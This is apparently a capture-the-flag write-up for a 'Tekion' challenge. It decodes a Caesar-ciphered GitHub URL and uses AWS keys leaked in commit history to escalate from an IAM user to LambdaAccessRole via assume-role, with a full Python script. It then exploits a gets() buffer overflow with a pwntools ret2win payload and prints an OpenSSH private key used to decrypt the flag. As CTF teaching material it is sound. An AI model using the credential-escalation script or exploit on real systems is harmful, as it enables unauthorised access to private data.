Tekion

Last updated 23 days ago

Tekion CTF Challenge:

Challenge:

Solution:

cookn://bdocpw.xjh/ozfdji-nkzzy/cmhn-xjhk-ntnozhn-yphk/omzz/hvdi

1. The given input is a Caesar cipher: every letter has been shifted back by 5 positions (punctuation is untouched), so shifting each letter forward by 5 decodes it.

2. The decoded value is a GitHub URL.
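As an added worked example (not code from the original writeup), the decode step in Python: shift letters, brute-force all 26 shifts, and pick the one that yields a URL. Only the ciphertext and the resulting URL come from the writeup; the function names are my own.

```python
import string

# From the writeup: the challenge input and the URL it decodes to.
CIPHERTEXT = "cookn://bdocpw.xjh/ozfdji-nkzzy/cmhn-xjhk-ntnozhn-yphk/omzz/hvdi"
EXPECTED = "https://github.com/tekion-speed/hrms-comp-systems-dump/tree/main"

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def caesar_shift(text: str, shift: int) -> str:
    """Shift every ASCII letter forward by `shift` positions (mod 26).

    Non-letters (':', '/', '-', '.') are left untouched, which is exactly why the
    URL's punctuation survives the cipher and gives us a crib to brute-force with.
    """
    shift %= 26
    table = str.maketrans(
        LOWER + UPPER,
        LOWER[shift:] + LOWER[:shift] + UPPER[shift:] + UPPER[:shift],
    )
    return text.translate(table)


def caesar_bruteforce(ciphertext: str):
    """All 26 candidate plaintexts as (shift, plaintext) pairs."""
    return [(s, caesar_shift(ciphertext, s)) for s in range(26)]


def decode_url(ciphertext: str):
    """Pick the shift whose plaintext starts with a URL scheme.

    Returns (shift, plaintext), or None if no shift produces a URL.
    """
    for shift, candidate in caesar_bruteforce(ciphertext):
        if candidate.startswith(("http://", "https://")):
            return shift, candidate
    return None


if __name__ == "__main__":
    for shift, candidate in caesar_bruteforce(CIPHERTEXT):
        print(f"{shift:2d}: {candidate}")
    print("decoded:", decode_url(CIPHERTEXT))
```

The encoder shifted the plaintext back by 5 (equivalently, forward by 21), so decoding is a forward shift of 5; the brute force is there because a real challenge rarely tells you the shift.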

3. Checking the repository's commit history, we found an AWS access key ID and secret access key.

4. Using that key pair we can reach the S3 bucket, enumerate it, and escalate from the IAM user salary-details-system-user to the role LambdaAccessRole, which is what finally lets us read hr_systems_salary_module.json.

  1. Configure the AWS CLI with the leaked access key ID and secret access key.

  2. Call get-session-token to obtain temporary credentials (access key ID, secret access key and session token) for the user, and configure the CLI with all three. These let us make API calls to any AWS service the user's policy allows.

  3. Call get-caller-identity to see which IAM user or role the credentials belong to.

  4. The LambdaAccessRole role was found in the GitHub commits.

  5. Call assume-role on LambdaAccessRole to obtain temporary security credentials for that role.

  6. Once the credentials returned by assume-role are set, we are acting as the role and can read hr_systems_salary_module.json, which the user itself was denied.
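The same chain as one script, added here as an example and not part of the original writeup. It drives the aws CLI through subprocess, so the verbs are the ones used above (get-session-token, get-caller-identity, assume-role, s3 cp). The role name, the user and the object name are from the writeup; the account ID in the role ARN, the bucket name, the session name and the sample STS responses are assumed or constructed.

```python
import json
import os
import subprocess

# Assumed placeholders: the writeup gives the role name and the object name but
# not the account ID or the bucket, so those two are made up here.
ROLE_ARN = "arn:aws:iam::123456789012:role/LambdaAccessRole"
OBJECT_URI = "s3://example-hr-bucket/hr_systems_salary_module.json"

AWS_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")

# Constructed sample responses (shape of real STS output, values invented).
SAMPLE_STS_RESPONSE = {
    "Credentials": {
        "AccessKeyId": "ASIAEXAMPLETEMP",
        "SecretAccessKey": "tempsecret",
        "SessionToken": "temptoken",
        "Expiration": "2025-01-01T00:00:00Z",
    }
}
SAMPLE_IDENTITY = {
    "UserId": "AROAEXAMPLE:ctf",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/LambdaAccessRole/ctf",
}


def aws(args, env):
    """Run one aws CLI command with the given environment and parse its JSON output."""
    proc = subprocess.run(["aws", *args, "--output", "json"], env=env,
                          check=True, capture_output=True, text=True)
    return json.loads(proc.stdout)


def long_term_env(access_key_id, secret_access_key, base=None):
    """Environment for the leaked long-term key pair (step 1).

    Any stale AWS_SESSION_TOKEN is dropped first: the CLI would otherwise send the
    old token alongside the long-term key and STS rejects the request as an
    invalid security token.
    """
    env = dict(os.environ if base is None else base)
    for var in AWS_VARS:
        env.pop(var, None)
    env["AWS_ACCESS_KEY_ID"] = access_key_id
    env["AWS_SECRET_ACCESS_KEY"] = secret_access_key
    return env


def temp_creds_env(sts_response, base):
    """Environment built from the Credentials block that both
    `sts get-session-token` (step 2) and `sts assume-role` (step 5) return."""
    creds = sts_response["Credentials"]
    env = dict(base)
    env["AWS_ACCESS_KEY_ID"] = creds["AccessKeyId"]
    env["AWS_SECRET_ACCESS_KEY"] = creds["SecretAccessKey"]
    env["AWS_SESSION_TOKEN"] = creds["SessionToken"]
    return env


def principal(identity):
    """(account, ARN) from `sts get-caller-identity` (step 3). The ARN shows
    whether you are still the IAM user or already the assumed role."""
    return identity["Account"], identity["Arn"]


def escalate(access_key_id, secret_access_key, dest="hr_systems_salary_module.json"):
    """Steps 1-6: long-term key -> session token -> assume-role -> read the object."""
    env = long_term_env(access_key_id, secret_access_key)
    env = temp_creds_env(aws(["sts", "get-session-token"], env), env)
    print("user:", principal(aws(["sts", "get-caller-identity"], env)))
    resp = aws(["sts", "assume-role", "--role-arn", ROLE_ARN,
                "--role-session-name", "ctf"], env)
    env = temp_creds_env(resp, env)
    print("role:", principal(aws(["sts", "get-caller-identity"], env)))
    # The object the user is denied becomes readable with the role's session.
    subprocess.run(["aws", "s3", "cp", OBJECT_URI, dest], env=env, check=True)
    return dest


if __name__ == "__main__":
    import sys
    escalate(sys.argv[1], sys.argv[2])
```

Run it as `python3 escalate.py AKIA... SECRET`. Passing credentials through a per-call environment rather than `aws configure` keeps the leaked key, the session-token credentials and the role credentials separate, which is what makes the second get-caller-identity a reliable check that the assume-role actually worked.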

5. The file is an ELF binary.

6. It looks vulnerable to a buffer overflow.

7. Disassembling the binary in Ghidra shows that main() calls vulnerable_function().

8. vulnerable_function() reads its input with gets(), which never checks the size of the destination buffer and is therefore vulnerable to a stack buffer overflow.

Man page of gets(): gets() reads a line from stdin into the buffer with no way to limit how many bytes it writes, which is why the man page says to never use this function.

9. hidden_function() is never called anywhere in the program, so it is the ret2win target.

10. Debugging the program in GDB:

11. Finding the offset: 72 bytes of padding reach the saved return address.
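How the offset is found, as an added example rather than the writeup's own GDB session: send a de Bruijn (cyclic) pattern, read the pattern bytes that sit where the return address should be when the program faults, and map them back to a position. This reimplements the idea behind pwntools' cyclic() and cyclic_find() in plain Python so it runs without pwntools installed; the crash value is constructed from the writeup's offset of 72, and the function names are mine.

```python
import string

ALPHABET = string.ascii_lowercase
SUBSEQ = 4  # every 4-byte window of the pattern is unique (pwntools' default too)


def cyclic(length, alphabet=ALPHABET, n=SUBSEQ):
    """First `length` bytes of the de Bruijn sequence B(len(alphabet), n).

    Every n-byte window occurs exactly once, so any n bytes recovered from a
    crash map back to a single position in the pattern.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    if len(out) >= length:
                        break
                    out.append(ord(alphabet[i]))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= length:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


def cyclic_find(value, alphabet=ALPHABET, n=SUBSEQ, max_length=4096):
    """Offset of `value` inside the pattern, or -1 if it is not part of it.

    `value` is either raw bytes or an integer read from a register / stack
    slot, which is unpacked little-endian like the x86-64 stack stores it.
    """
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    return cyclic(max_length, alphabet, n).find(value[:n])


def find_offset(crash_qword):
    """After the crash: `x/gx $rsp` at the faulting `ret` on x86-64 (or `p $rip`
    on a 32-bit target) gives the qword that overwrote the return address."""
    return cyclic_find(crash_qword)


# Constructed crash value: pretend the 8 bytes at $rsp when chall.bin faults are
# pattern[72:80], i.e. the writeup's offset. With pwntools you would first do
# p.sendlineafter(b'details: ', cyclic(200)) and read the value from GDB.
CONSTRUCTED_CRASH_QWORD = int.from_bytes(cyclic(200)[72:80], "little")

if __name__ == "__main__":
    print(cyclic(100).decode())
    print("offset:", find_offset(CONSTRUCTED_CRASH_QWORD))
```

On x86-64 the faulting instruction is the `ret` itself, because a pattern value is not a canonical address and cannot be loaded into RIP; that is why the bytes are read from the top of the stack rather than from RIP.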

12. Writing the ret2win exploit to solve the challenge. The extra ret gadget before hidden_function() keeps the stack 16-byte aligned on entry, which avoids a crash in code that expects an aligned stack:

from pwn import *

# Challenge binary; checksec output is not needed here.
elf = context.binary = ELF("./chall.bin", checksec=False)
p = elf.process()

# A lone 'ret' gadget: realigns the stack before hidden_function() is entered.
ret_gadget = 0x00000000004013eb

payload = b'A' * 72                          # padding up to the saved return address
payload += p64(ret_gadget)
payload += p64(elf.sym['hidden_function'])   # ret2win target

p.sendlineafter(b'details: ', payload)
p.interactive()

Running it prints the private key:

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCm0v2+zu5Btor6YJ20TdzaM7mldS6FgoxDGScF4bBtlgAAAKANaPlnDWj5
ZwAAAAtzc2gtZWQyNTUxOQAAACCm0v2+zu5Btor6YJ20TdzaM7mldS6FgoxDGScF4bBtlg
AAAEDR8fnfU6WumUI9Qh7qi1qpUgBFfzAMYbVzDdKgflzcpqbS/b7O7kG2ivpgnbRN3Noz
uaV1LoWCjEMZJwXhsG2WAAAAF3VidW50dUBpcC0xNzItMzEtNDMtMTE3AQIDBAUG
-----END OPENSSH PRIVATE KEY-----

Save it to a file named privatekey.

13. Base64-decode the given age key (below) and save the raw decoded bytes as a file named agekey. It is an age file whose recipient is the ssh-ed25519 key above.

YWdlLWVuY3J5cHRpb24ub3JnL3YxCi0+IHNzaC1lZDI1NTE5IHBVT05LQSBGclNwUEwzNnBzVjZoUGVGdk9SVjFOOVRTd1JqRjdpTi9TaU81ckVudzFZCnl1WmlmV2diY2M2Smt5dFBmRFA4aW5JQ0loQTI0S1R3endlNmdmaTFSWEUKLS0tIE5yK0d3MFg5T0Vac0sxaGFNbUphcm9rbm1PUlRwVEZJNjRTZ0N3MTFFaTAKyJ9jMF/k1r9D3871i1PluzFDSo1kJZENZTI5+9HHPQLDlcTn9+xJmWIsrARtN7IrBzUp2lae9zH1T2xdI0Q1d5EAPBXP1MlNZGSb/X+5mNgPPLQucvWe3APKeGCtVB8BN5UVZREKbO/4iUP+wdgclw==

14. Decrypt the age file with age, passing the SSH private key as the identity:

age --decrypt --identity privatekey agekey > decrypt.txt && cat decrypt.txt

15. The flag format is string{string}.

We found the flag: almost_there{curious-seeker}

Note:

https://github.com/tekion-speed/hrms-comp-systems-dump/tree/main